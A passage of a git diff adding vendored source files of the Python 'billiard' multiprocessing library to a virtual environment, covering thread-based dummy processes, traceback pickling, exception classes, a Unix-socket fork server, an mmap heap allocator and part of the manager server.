+# +# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE +# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS +# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT +# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY +# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +# SUCH DAMAGE. +# + +# +# Imports +# + +import threading +import sys +import weakref +import array + +from threading import Lock, RLock, Semaphore, BoundedSemaphore +from threading import Event + +from queue import Queue + +from billiard.connection import Pipe + +__all__ = [ + 'Process', 'current_process', 'active_children', 'freeze_support', + 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', + 'Event', 'Queue', 'Manager', 'Pipe', 'Pool', 'JoinableQueue' +] + + +class DummyProcess(threading.Thread): + + def __init__(self, group=None, target=None, name=None, args=(), kwargs={}): + threading.Thread.__init__(self, group, target, name, args, kwargs) + self._pid = None + self._children = weakref.WeakKeyDictionary() + self._start_called = False + self._parent = current_process() + + def start(self): + assert self._parent is current_process() + self._start_called = True + if hasattr(self._parent, '_children'): + self._parent._children[self] = None + threading.Thread.start(self) + + @property + def exitcode(self): + if self._start_called and not self.is_alive(): + return 0 + else: + return None + + +try: + _Condition = threading._Condition +except AttributeError: # Py3 + _Condition = threading.Condition # noqa + + +class Condition(_Condition): + if sys.version_info[0] == 3: + notify_all = _Condition.notifyAll + else: + notify_all = _Condition.notifyAll.__func__ + + +Process = DummyProcess +current_process = threading.current_thread +current_process()._children = weakref.WeakKeyDictionary() + + +def active_children(): + children = current_process()._children + for p in list(children): + if not p.is_alive(): + children.pop(p, None) + return list(children) + + +def freeze_support(): + pass + + +class Namespace(object): + + def __init__(self, **kwds): + self.__dict__.update(kwds) + + def __repr__(self): + items = list(self.__dict__.items()) + temp = [] + for name, value in items: + if not name.startswith('_'): + temp.append('%s=%r' % (name, value)) + temp.sort() + return '%s(%s)' % (self.__class__.__name__, str.join(', ', temp)) + + +dict = dict +list = list + + +def Array(typecode, sequence, lock=True): + return array.array(typecode, sequence) + + +class Value(object): + + def __init__(self, typecode, value, lock=True): + self._typecode = typecode + self._value = value + + def _get(self): + return self._value + + def _set(self, value): + self._value = value + value = property(_get, _set) + + def __repr__(self): + return '<%r(%r, %r)>' % (type(self).__name__, + self._typecode, self._value) + + +def Manager(): + return sys.modules[__name__] + + +def shutdown(): + pass + + +def Pool(processes=None, initializer=None, initargs=()): + from billiard.pool import ThreadPool + return ThreadPool(processes, initializer, initargs) + + +JoinableQueue = Queue 
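The billiard.dummy module added above mirrors the multiprocessing API using threads: Process is a thin wrapper around threading.Thread, Pool returns billiard's ThreadPool, and current_process aliases threading.current_thread. A minimal usage sketch follows (not part of the vendored diff); it assumes billiard is importable from this environment, and the _square/_report workers and the pool size are hypothetical names chosen for illustration.

    from billiard.dummy import Pool, Process, current_process

    def _square(x):
        # Executed in a worker thread, not a separate OS process.
        return x * x

    def _report():
        # current_process() is threading.current_thread() in billiard.dummy.
        print('running in', current_process().name)

    if __name__ == '__main__':
        p = Process(target=_report)   # DummyProcess: a thread with a Process-like API
        p.start()
        p.join()

        pool = Pool(3)                # backed by billiard.pool.ThreadPool
        try:
            print(pool.map(_square, [1, 2, 3]))   # -> [1, 4, 9]
        finally:
            pool.close()
            pool.join()

The point of the thread-backed variant is that code written against the Process/Pool interface can be exercised in-process (for tests or I/O-bound work) without changing call sites.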
diff --git a/env/Lib/site-packages/billiard/dummy/connection.py b/env/Lib/site-packages/billiard/dummy/connection.py new file mode 100644 index 00000000..fe2de94f --- /dev/null +++ b/env/Lib/site-packages/billiard/dummy/connection.py @@ -0,0 +1,92 @@ +# +# Analogue of `multiprocessing.connection` which uses queues instead of sockets +# +# multiprocessing/dummy/connection.py +# +# Copyright (c) 2006-2008, R Oudkerk +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions +# are met: +# +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# 2. Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# 3. Neither the name of author nor the names of any contributors may be +# used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE +# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS +# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT +# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY +# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +# SUCH DAMAGE. 
+# + +from queue import Queue + +__all__ = ['Client', 'Listener', 'Pipe'] + +families = [None] + + +class Listener(object): + + def __init__(self, address=None, family=None, backlog=1): + self._backlog_queue = Queue(backlog) + + def accept(self): + return Connection(*self._backlog_queue.get()) + + def close(self): + self._backlog_queue = None + + address = property(lambda self: self._backlog_queue) + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.close() + + +def Client(address): + _in, _out = Queue(), Queue() + address.put((_out, _in)) + return Connection(_in, _out) + + +def Pipe(duplex=True): + a, b = Queue(), Queue() + return Connection(a, b), Connection(b, a) + + +class Connection(object): + + def __init__(self, _in, _out): + self._out = _out + self._in = _in + self.send = self.send_bytes = _out.put + self.recv = self.recv_bytes = _in.get + + def poll(self, timeout=0.0): + if self._in.qsize() > 0: + return True + if timeout <= 0.0: + return False + self._in.not_empty.acquire() + self._in.not_empty.wait(timeout) + self._in.not_empty.release() + return self._in.qsize() > 0 + + def close(self): + pass diff --git a/env/Lib/site-packages/billiard/einfo.py b/env/Lib/site-packages/billiard/einfo.py new file mode 100644 index 00000000..f82c5f50 --- /dev/null +++ b/env/Lib/site-packages/billiard/einfo.py @@ -0,0 +1,167 @@ +import sys +import traceback + +__all__ = ['ExceptionInfo', 'Traceback'] + +DEFAULT_MAX_FRAMES = sys.getrecursionlimit() // 8 + + +class _Code: + + def __init__(self, code): + self.co_filename = code.co_filename + self.co_name = code.co_name + self.co_argcount = code.co_argcount + self.co_cellvars = () + self.co_firstlineno = code.co_firstlineno + self.co_flags = code.co_flags + self.co_freevars = () + self.co_code = b'' + self.co_lnotab = b'' + self.co_names = code.co_names + self.co_nlocals = code.co_nlocals + self.co_stacksize = code.co_stacksize + self.co_varnames = () + if sys.version_info >= (3, 11): + self._co_positions = list(code.co_positions()) + + if sys.version_info >= (3, 11): + @property + def co_positions(self): + return self._co_positions.__iter__ + + +class _Frame: + Code = _Code + + def __init__(self, frame): + self.f_builtins = {} + self.f_globals = { + "__file__": frame.f_globals.get("__file__", "__main__"), + "__name__": frame.f_globals.get("__name__"), + "__loader__": None, + } + self.f_locals = fl = {} + try: + fl["__traceback_hide__"] = frame.f_locals["__traceback_hide__"] + except KeyError: + pass + self.f_back = None + self.f_trace = None + self.f_exc_traceback = None + self.f_exc_type = None + self.f_exc_value = None + self.f_code = self.Code(frame.f_code) + self.f_lineno = frame.f_lineno + self.f_lasti = frame.f_lasti + # don't want to hit https://bugs.python.org/issue21967 + self.f_restricted = False + + +class _Object: + + def __init__(self, **kw): + [setattr(self, k, v) for k, v in kw.items()] + + +class _Truncated: + + def __init__(self): + self.tb_lineno = -1 + self.tb_frame = _Object( + f_globals={"__file__": "", + "__name__": "", + "__loader__": None}, + f_fileno=None, + f_code=_Object(co_filename="...", + co_name="[rest of traceback truncated]"), + ) + self.tb_next = None + self.tb_lasti = 0 + + +class Traceback: + Frame = _Frame + + def __init__(self, tb, max_frames=DEFAULT_MAX_FRAMES, depth=0): + self.tb_frame = self.Frame(tb.tb_frame) + self.tb_lineno = tb.tb_lineno + self.tb_lasti = tb.tb_lasti + self.tb_next = None + if tb.tb_next is not None: + if depth <= max_frames: + self.tb_next = 
Traceback(tb.tb_next, max_frames, depth + 1) + else: + self.tb_next = _Truncated() + + +class RemoteTraceback(Exception): + def __init__(self, tb): + self.tb = tb + + def __str__(self): + return self.tb + + +class ExceptionWithTraceback(Exception): + def __init__(self, exc, tb): + self.exc = exc + self.tb = '\n"""\n%s"""' % tb + super().__init__() + + def __str__(self): + return self.tb + + def __reduce__(self): + return rebuild_exc, (self.exc, self.tb) + + +def rebuild_exc(exc, tb): + exc.__cause__ = RemoteTraceback(tb) + return exc + + +class ExceptionInfo: + """Exception wrapping an exception and its traceback. + + :param exc_info: The exception info tuple as returned by + :func:`sys.exc_info`. + + """ + + #: Exception type. + type = None + + #: Exception instance. + exception = None + + #: Pickleable traceback instance for use with :mod:`traceback` + tb = None + + #: String representation of the traceback. + traceback = None + + #: Set to true if this is an internal error. + internal = False + + def __init__(self, exc_info=None, internal=False): + self.type, exception, tb = exc_info or sys.exc_info() + try: + self.tb = Traceback(tb) + self.traceback = ''.join( + traceback.format_exception(self.type, exception, tb), + ) + self.internal = internal + finally: + del tb + self.exception = ExceptionWithTraceback(exception, self.traceback) + + def __str__(self): + return self.traceback + + def __repr__(self): + return "<%s: %r>" % (self.__class__.__name__, self.exception, ) + + @property + def exc_info(self): + return self.type, self.exception, self.tb diff --git a/env/Lib/site-packages/billiard/exceptions.py b/env/Lib/site-packages/billiard/exceptions.py new file mode 100644 index 00000000..11e2e7ec --- /dev/null +++ b/env/Lib/site-packages/billiard/exceptions.py @@ -0,0 +1,52 @@ +try: + from multiprocessing import ( + ProcessError, + BufferTooShort, + TimeoutError, + AuthenticationError, + ) +except ImportError: + class ProcessError(Exception): # noqa + pass + + class BufferTooShort(ProcessError): # noqa + pass + + class TimeoutError(ProcessError): # noqa + pass + + class AuthenticationError(ProcessError): # noqa + pass + + +class TimeLimitExceeded(Exception): + """The time limit has been exceeded and the job has been terminated.""" + + def __str__(self): + return "TimeLimitExceeded%s" % (self.args, ) + + +class SoftTimeLimitExceeded(Exception): + """The soft time limit has been exceeded. This exception is raised + to give the task a chance to clean up.""" + + def __str__(self): + return "SoftTimeLimitExceeded%s" % (self.args, ) + + +class WorkerLostError(Exception): + """The worker processing a job has exited prematurely.""" + + +class Terminated(Exception): + """The worker processing a job has been terminated by user request.""" + + +class RestartFreqExceeded(Exception): + """Restarts too fast.""" + + +class CoroStop(Exception): + """Coroutine exit, as opposed to StopIteration which may + mean it should be restarted.""" + pass diff --git a/env/Lib/site-packages/billiard/forkserver.py b/env/Lib/site-packages/billiard/forkserver.py new file mode 100644 index 00000000..9e6a9c91 --- /dev/null +++ b/env/Lib/site-packages/billiard/forkserver.py @@ -0,0 +1,264 @@ +import errno +import os +import selectors +import signal +import socket +import struct +import sys +import threading + +from . import connection +from . import process +from . import reduction +from . import semaphore_tracker +from . import spawn +from . 
import util + +from .compat import spawnv_passfds + +__all__ = ['ensure_running', 'get_inherited_fds', 'connect_to_new_process', + 'set_forkserver_preload'] + +# +# +# + +MAXFDS_TO_SEND = 256 +UNSIGNED_STRUCT = struct.Struct('Q') # large enough for pid_t + +# +# Forkserver class +# + + +class ForkServer: + + def __init__(self): + self._forkserver_address = None + self._forkserver_alive_fd = None + self._inherited_fds = None + self._lock = threading.Lock() + self._preload_modules = ['__main__'] + + def set_forkserver_preload(self, modules_names): + '''Set list of module names to try to load in forkserver process.''' + if not all(type(mod) is str for mod in self._preload_modules): + raise TypeError('module_names must be a list of strings') + self._preload_modules = modules_names + + def get_inherited_fds(self): + '''Return list of fds inherited from parent process. + + This returns None if the current process was not started by fork + server. + ''' + return self._inherited_fds + + def connect_to_new_process(self, fds): + '''Request forkserver to create a child process. + + Returns a pair of fds (status_r, data_w). The calling process can read + the child process's pid and (eventually) its returncode from status_r. + The calling process should write to data_w the pickled preparation and + process data. + ''' + self.ensure_running() + if len(fds) + 4 >= MAXFDS_TO_SEND: + raise ValueError('too many fds') + with socket.socket(socket.AF_UNIX) as client: + client.connect(self._forkserver_address) + parent_r, child_w = os.pipe() + child_r, parent_w = os.pipe() + allfds = [child_r, child_w, self._forkserver_alive_fd, + semaphore_tracker.getfd()] + allfds += fds + try: + reduction.sendfds(client, allfds) + return parent_r, parent_w + except: + os.close(parent_r) + os.close(parent_w) + raise + finally: + os.close(child_r) + os.close(child_w) + + def ensure_running(self): + '''Make sure that a fork server is running. + + This can be called from any process. Note that usually a child + process will just reuse the forkserver started by its parent, so + ensure_running() will do nothing. + ''' + with self._lock: + semaphore_tracker.ensure_running() + if self._forkserver_alive_fd is not None: + return + + cmd = ('from billiard.forkserver import main; ' + + 'main(%d, %d, %r, **%r)') + + if self._preload_modules: + desired_keys = {'main_path', 'sys_path'} + data = spawn.get_preparation_data('ignore') + data = { + x: y for (x, y) in data.items() if x in desired_keys + } + else: + data = {} + + with socket.socket(socket.AF_UNIX) as listener: + address = connection.arbitrary_address('AF_UNIX') + listener.bind(address) + os.chmod(address, 0o600) + listener.listen() + + # all client processes own the write end of the "alive" pipe; + # when they all terminate the read end becomes ready. 
+ alive_r, alive_w = os.pipe() + try: + fds_to_pass = [listener.fileno(), alive_r] + cmd %= (listener.fileno(), alive_r, self._preload_modules, + data) + exe = spawn.get_executable() + args = [exe] + util._args_from_interpreter_flags() + args += ['-c', cmd] + spawnv_passfds(exe, args, fds_to_pass) + except: + os.close(alive_w) + raise + finally: + os.close(alive_r) + self._forkserver_address = address + self._forkserver_alive_fd = alive_w + +# +# +# + + +def main(listener_fd, alive_r, preload, main_path=None, sys_path=None): + '''Run forkserver.''' + if preload: + if '__main__' in preload and main_path is not None: + process.current_process()._inheriting = True + try: + spawn.import_main_path(main_path) + finally: + del process.current_process()._inheriting + for modname in preload: + try: + __import__(modname) + except ImportError: + pass + + # close sys.stdin + if sys.stdin is not None: + try: + sys.stdin.close() + sys.stdin = open(os.devnull) + except (OSError, ValueError): + pass + + # ignoring SIGCHLD means no need to reap zombie processes + handler = signal.signal(signal.SIGCHLD, signal.SIG_IGN) + with socket.socket(socket.AF_UNIX, fileno=listener_fd) as listener, \ + selectors.DefaultSelector() as selector: + _forkserver._forkserver_address = listener.getsockname() + selector.register(listener, selectors.EVENT_READ) + selector.register(alive_r, selectors.EVENT_READ) + + while True: + try: + while True: + rfds = [key.fileobj for (key, events) in selector.select()] + if rfds: + break + + if alive_r in rfds: + # EOF because no more client processes left + assert os.read(alive_r, 1) == b'' + raise SystemExit + + assert listener in rfds + with listener.accept()[0] as s: + code = 1 + if os.fork() == 0: + try: + _serve_one(s, listener, alive_r, handler) + except Exception: + sys.excepthook(*sys.exc_info()) + sys.stderr.flush() + finally: + os._exit(code) + except OSError as e: + if e.errno != errno.ECONNABORTED: + raise + + +def __unpack_fds(child_r, child_w, alive, stfd, *inherited): + return child_r, child_w, alive, stfd, inherited + + +def _serve_one(s, listener, alive_r, handler): + # close unnecessary stuff and reset SIGCHLD handler + listener.close() + os.close(alive_r) + signal.signal(signal.SIGCHLD, handler) + + # receive fds from parent process + fds = reduction.recvfds(s, MAXFDS_TO_SEND + 1) + s.close() + assert len(fds) <= MAXFDS_TO_SEND + + (child_r, child_w, _forkserver._forkserver_alive_fd, + stfd, _forkserver._inherited_fds) = __unpack_fds(*fds) + semaphore_tracker._semaphore_tracker._fd = stfd + + # send pid to client processes + write_unsigned(child_w, os.getpid()) + + # reseed random number generator + if 'random' in sys.modules: + import random + random.seed() + + # run process object received over pipe + code = spawn._main(child_r) + + # write the exit code to the pipe + write_unsigned(child_w, code) + +# +# Read and write unsigned numbers +# + + +def read_unsigned(fd): + data = b'' + length = UNSIGNED_STRUCT.size + while len(data) < length: + s = os.read(fd, length - len(data)) + if not s: + raise EOFError('unexpected EOF') + data += s + return UNSIGNED_STRUCT.unpack(data)[0] + + +def write_unsigned(fd, n): + msg = UNSIGNED_STRUCT.pack(n) + while msg: + nbytes = os.write(fd, msg) + if nbytes == 0: + raise RuntimeError('should not get here') + msg = msg[nbytes:] + +# +# +# + +_forkserver = ForkServer() +ensure_running = _forkserver.ensure_running +get_inherited_fds = _forkserver.get_inherited_fds +connect_to_new_process = _forkserver.connect_to_new_process 
+set_forkserver_preload = _forkserver.set_forkserver_preload diff --git a/env/Lib/site-packages/billiard/heap.py b/env/Lib/site-packages/billiard/heap.py new file mode 100644 index 00000000..fc11950f --- /dev/null +++ b/env/Lib/site-packages/billiard/heap.py @@ -0,0 +1,288 @@ +# +# Module which supports allocation of memory from an mmap +# +# multiprocessing/heap.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import bisect +import errno +import io +import mmap +import os +import sys +import threading +import tempfile + +from . import context +from . import reduction +from . import util + +from ._ext import _billiard, win32 + +__all__ = ['BufferWrapper'] + +PY3 = sys.version_info[0] == 3 + +# +# Inheritable class which wraps an mmap, and from which blocks can be allocated +# + +if sys.platform == 'win32': + + class Arena: + + _rand = tempfile._RandomNameSequence() + + def __init__(self, size): + self.size = size + for i in range(100): + name = 'pym-%d-%s' % (os.getpid(), next(self._rand)) + buf = mmap.mmap(-1, size, tagname=name) + if win32.GetLastError() == 0: + break + # we have reopened a preexisting map + buf.close() + else: + exc = IOError('Cannot find name for new mmap') + exc.errno = errno.EEXIST + raise exc + self.name = name + self.buffer = buf + self._state = (self.size, self.name) + + def __getstate__(self): + context.assert_spawning(self) + return self._state + + def __setstate__(self, state): + self.size, self.name = self._state = state + self.buffer = mmap.mmap(-1, self.size, tagname=self.name) + # XXX Temporarily preventing buildbot failures while determining + # XXX the correct long-term fix. See issue #23060 + # assert win32.GetLastError() == win32.ERROR_ALREADY_EXISTS + +else: + + class Arena: + + def __init__(self, size, fd=-1): + self.size = size + self.fd = fd + if fd == -1: + if PY3: + self.fd, name = tempfile.mkstemp( + prefix='pym-%d-' % (os.getpid(),), + dir=util.get_temp_dir(), + ) + + os.unlink(name) + util.Finalize(self, os.close, (self.fd,)) + with io.open(self.fd, 'wb', closefd=False) as f: + bs = 1024 * 1024 + if size >= bs: + zeros = b'\0' * bs + for _ in range(size // bs): + f.write(zeros) + del(zeros) + f.write(b'\0' * (size % bs)) + assert f.tell() == size + else: + name = tempfile.mktemp( + prefix='pym-%d-' % (os.getpid(),), + dir=util.get_temp_dir(), + ) + self.fd = os.open( + name, os.O_RDWR | os.O_CREAT | os.O_EXCL, 0o600, + ) + util.Finalize(self, os.close, (self.fd,)) + os.unlink(name) + os.ftruncate(self.fd, size) + self.buffer = mmap.mmap(self.fd, self.size) + + def reduce_arena(a): + if a.fd == -1: + raise ValueError('Arena is unpicklable because' + 'forking was enabled when it was created') + return rebuild_arena, (a.size, reduction.DupFd(a.fd)) + + def rebuild_arena(size, dupfd): + return Arena(size, dupfd.detach()) + + reduction.register(Arena, reduce_arena) + +# +# Class allowing allocation of chunks of memory from arenas +# + + +class Heap: + + _alignment = 8 + + def __init__(self, size=mmap.PAGESIZE): + self._lastpid = os.getpid() + self._lock = threading.Lock() + self._size = size + self._lengths = [] + self._len_to_seq = {} + self._start_to_block = {} + self._stop_to_block = {} + self._allocated_blocks = set() + self._arenas = [] + # list of pending blocks to free - see free() comment below + self._pending_free_blocks = [] + + @staticmethod + def _roundup(n, alignment): + # alignment must be a power of 2 + mask = alignment - 1 + return (n + mask) & ~mask + + def _malloc(self, size): + # 
returns a large enough block -- it might be much larger + i = bisect.bisect_left(self._lengths, size) + if i == len(self._lengths): + length = self._roundup(max(self._size, size), mmap.PAGESIZE) + self._size *= 2 + util.info('allocating a new mmap of length %d', length) + arena = Arena(length) + self._arenas.append(arena) + return (arena, 0, length) + else: + length = self._lengths[i] + seq = self._len_to_seq[length] + block = seq.pop() + if not seq: + del self._len_to_seq[length], self._lengths[i] + + (arena, start, stop) = block + del self._start_to_block[(arena, start)] + del self._stop_to_block[(arena, stop)] + return block + + def _free(self, block): + # free location and try to merge with neighbours + (arena, start, stop) = block + + try: + prev_block = self._stop_to_block[(arena, start)] + except KeyError: + pass + else: + start, _ = self._absorb(prev_block) + + try: + next_block = self._start_to_block[(arena, stop)] + except KeyError: + pass + else: + _, stop = self._absorb(next_block) + + block = (arena, start, stop) + length = stop - start + + try: + self._len_to_seq[length].append(block) + except KeyError: + self._len_to_seq[length] = [block] + bisect.insort(self._lengths, length) + + self._start_to_block[(arena, start)] = block + self._stop_to_block[(arena, stop)] = block + + def _absorb(self, block): + # deregister this block so it can be merged with a neighbour + (arena, start, stop) = block + del self._start_to_block[(arena, start)] + del self._stop_to_block[(arena, stop)] + + length = stop - start + seq = self._len_to_seq[length] + seq.remove(block) + if not seq: + del self._len_to_seq[length] + self._lengths.remove(length) + + return start, stop + + def _free_pending_blocks(self): + # Free all the blocks in the pending list - called with the lock held + while 1: + try: + block = self._pending_free_blocks.pop() + except IndexError: + break + self._allocated_blocks.remove(block) + self._free(block) + + def free(self, block): + # free a block returned by malloc() + # Since free() can be called asynchronously by the GC, it could happen + # that it's called while self._lock is held: in that case, + # self._lock.acquire() would deadlock (issue #12352). To avoid that, a + # trylock is used instead, and if the lock can't be acquired + # immediately, the block is added to a list of blocks to be freed + # synchronously sometimes later from malloc() or free(), by calling + # _free_pending_blocks() (appending and retrieving from a list is not + # strictly thread-safe but under cPython it's atomic + # thanks to the GIL). 
+ assert os.getpid() == self._lastpid + if not self._lock.acquire(False): + # can't acquire the lock right now, add the block to the list of + # pending blocks to free + self._pending_free_blocks.append(block) + else: + # we hold the lock + try: + self._free_pending_blocks() + self._allocated_blocks.remove(block) + self._free(block) + finally: + self._lock.release() + + def malloc(self, size): + # return a block of right size (possibly rounded up) + assert 0 <= size < sys.maxsize + if os.getpid() != self._lastpid: + self.__init__() # reinitialize after fork + with self._lock: + self._free_pending_blocks() + size = self._roundup(max(size, 1), self._alignment) + (arena, start, stop) = self._malloc(size) + new_stop = start + size + if new_stop < stop: + self._free((arena, new_stop, stop)) + block = (arena, start, new_stop) + self._allocated_blocks.add(block) + return block + +# +# Class representing a chunk of an mmap -- can be inherited +# + + +class BufferWrapper: + + _heap = Heap() + + def __init__(self, size): + assert 0 <= size < sys.maxsize + block = BufferWrapper._heap.malloc(size) + self._state = (block, size) + util.Finalize(self, BufferWrapper._heap.free, args=(block,)) + + def get_address(self): + (arena, start, stop), size = self._state + address, length = _billiard.address_of_buffer(arena.buffer) + assert size <= length + return address + start + + def get_size(self): + return self._state[1] + + def create_memoryview(self): + (arena, start, stop), size = self._state + return memoryview(arena.buffer)[start:start + size] diff --git a/env/Lib/site-packages/billiard/managers.py b/env/Lib/site-packages/billiard/managers.py new file mode 100644 index 00000000..6a496c65 --- /dev/null +++ b/env/Lib/site-packages/billiard/managers.py @@ -0,0 +1,1210 @@ +# +# Module providing the `SyncManager` class for dealing +# with shared objects +# +# multiprocessing/managers.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +# +# Imports +# + +import sys +import threading +import array + +from traceback import format_exc + +from . import connection +from . import context +from . import pool +from . import process +from . import reduction +from . import util +from . 
import get_context + +from queue import Queue +from time import monotonic + +__all__ = ['BaseManager', 'SyncManager', 'BaseProxy', 'Token'] + +PY3 = sys.version_info[0] == 3 + +# +# Register some things for pickling +# + + +if PY3: + def reduce_array(a): + return array.array, (a.typecode, a.tobytes()) +else: + def reduce_array(a): # noqa + return array.array, (a.typecode, a.tostring()) +reduction.register(array.array, reduce_array) + +view_types = [type(getattr({}, name)()) + for name in ('items', 'keys', 'values')] +if view_types[0] is not list: # only needed in Py3.0 + + def rebuild_as_list(obj): + return list, (list(obj), ) + for view_type in view_types: + reduction.register(view_type, rebuild_as_list) + +# +# Type for identifying shared objects +# + + +class Token: + ''' + Type to uniquely identify a shared object + ''' + __slots__ = ('typeid', 'address', 'id') + + def __init__(self, typeid, address, id): + (self.typeid, self.address, self.id) = (typeid, address, id) + + def __getstate__(self): + return (self.typeid, self.address, self.id) + + def __setstate__(self, state): + (self.typeid, self.address, self.id) = state + + def __repr__(self): + return '%s(typeid=%r, address=%r, id=%r)' % \ + (self.__class__.__name__, self.typeid, self.address, self.id) + +# +# Function for communication with a manager's server process +# + + +def dispatch(c, id, methodname, args=(), kwds={}): + ''' + Send a message to manager using connection `c` and return response + ''' + c.send((id, methodname, args, kwds)) + kind, result = c.recv() + if kind == '#RETURN': + return result + raise convert_to_error(kind, result) + + +def convert_to_error(kind, result): + if kind == '#ERROR': + return result + elif kind == '#TRACEBACK': + assert type(result) is str + return RemoteError(result) + elif kind == '#UNSERIALIZABLE': + assert type(result) is str + return RemoteError('Unserializable message: %s\n' % result) + else: + return ValueError('Unrecognized message type') + + +class RemoteError(Exception): + + def __str__(self): + return ('\n' + '-' * 75 + '\n' + str(self.args[0]) + '-' * 75) + +# +# Functions for finding the method names of an object +# + + +def all_methods(obj): + ''' + Return a list of names of methods of `obj` + ''' + temp = [] + for name in dir(obj): + func = getattr(obj, name) + if callable(func): + temp.append(name) + return temp + + +def public_methods(obj): + ''' + Return a list of names of methods of `obj` which do not start with '_' + ''' + return [name for name in all_methods(obj) if name[0] != '_'] + +# +# Server which is run in a process controlled by a manager +# + + +class Server: + ''' + Server class which runs in a process controlled by a manager object + ''' + public = ['shutdown', 'create', 'accept_connection', 'get_methods', + 'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref'] + + def __init__(self, registry, address, authkey, serializer): + assert isinstance(authkey, bytes) + self.registry = registry + self.authkey = process.AuthenticationString(authkey) + Listener, Client = listener_client[serializer] + + # do authentication later + self.listener = Listener(address=address, backlog=16) + self.address = self.listener.address + + self.id_to_obj = {'0': (None, ())} + self.id_to_refcount = {} + self.mutex = threading.RLock() + + def serve_forever(self): + ''' + Run the server forever + ''' + self.stop_event = threading.Event() + process.current_process()._manager_server = self + try: + accepter = threading.Thread(target=self.accepter) + accepter.daemon = True + 
accepter.start() + try: + while not self.stop_event.is_set(): + self.stop_event.wait(1) + except (KeyboardInterrupt, SystemExit): + pass + finally: + if sys.stdout != sys.__stdout__: + util.debug('resetting stdout, stderr') + sys.stdout = sys.__stdout__ + sys.stderr = sys.__stderr__ + sys.exit(0) + + def accepter(self): + while True: + try: + c = self.listener.accept() + except OSError: + continue + t = threading.Thread(target=self.handle_request, args=(c, )) + t.daemon = True + t.start() + + def handle_request(self, c): + ''' + Handle a new connection + ''' + funcname = result = request = None + try: + connection.deliver_challenge(c, self.authkey) + connection.answer_challenge(c, self.authkey) + request = c.recv() + ignore, funcname, args, kwds = request + assert funcname in self.public, '%r unrecognized' % funcname + func = getattr(self, funcname) + except Exception: + msg = ('#TRACEBACK', format_exc()) + else: + try: + result = func(c, *args, **kwds) + except Exception: + msg = ('#TRACEBACK', format_exc()) + else: + msg = ('#RETURN', result) + try: + c.send(msg) + except Exception as exc: + try: + c.send(('#TRACEBACK', format_exc())) + except Exception: + pass + util.info('Failure to send message: %r', msg) + util.info(' ... request was %r', request) + util.info(' ... exception was %r', exc) + + c.close() + + def serve_client(self, conn): + ''' + Handle requests from the proxies in a particular process/thread + ''' + util.debug('starting server thread to service %r', + threading.current_thread().name) + + recv = conn.recv + send = conn.send + id_to_obj = self.id_to_obj + + while not self.stop_event.is_set(): + + try: + methodname = obj = None + request = recv() + ident, methodname, args, kwds = request + obj, exposed, gettypeid = id_to_obj[ident] + + if methodname not in exposed: + raise AttributeError( + 'method %r of %r object is not in exposed=%r' % ( + methodname, type(obj), exposed) + ) + + function = getattr(obj, methodname) + + try: + res = function(*args, **kwds) + except Exception as exc: + msg = ('#ERROR', exc) + else: + typeid = gettypeid and gettypeid.get(methodname, None) + if typeid: + rident, rexposed = self.create(conn, typeid, res) + token = Token(typeid, self.address, rident) + msg = ('#PROXY', (rexposed, token)) + else: + msg = ('#RETURN', res) + + except AttributeError: + if methodname is None: + msg = ('#TRACEBACK', format_exc()) + else: + try: + fallback_func = self.fallback_mapping[methodname] + result = fallback_func( + self, conn, ident, obj, *args, **kwds + ) + msg = ('#RETURN', result) + except Exception: + msg = ('#TRACEBACK', format_exc()) + + except EOFError: + util.debug('got EOF -- exiting thread serving %r', + threading.current_thread().name) + sys.exit(0) + + except Exception: + msg = ('#TRACEBACK', format_exc()) + + try: + try: + send(msg) + except Exception: + send(('#UNSERIALIZABLE', repr(msg))) + except Exception as exc: + util.info('exception in thread serving %r', + threading.current_thread().name) + util.info(' ... message was %r', msg) + util.info(' ... 
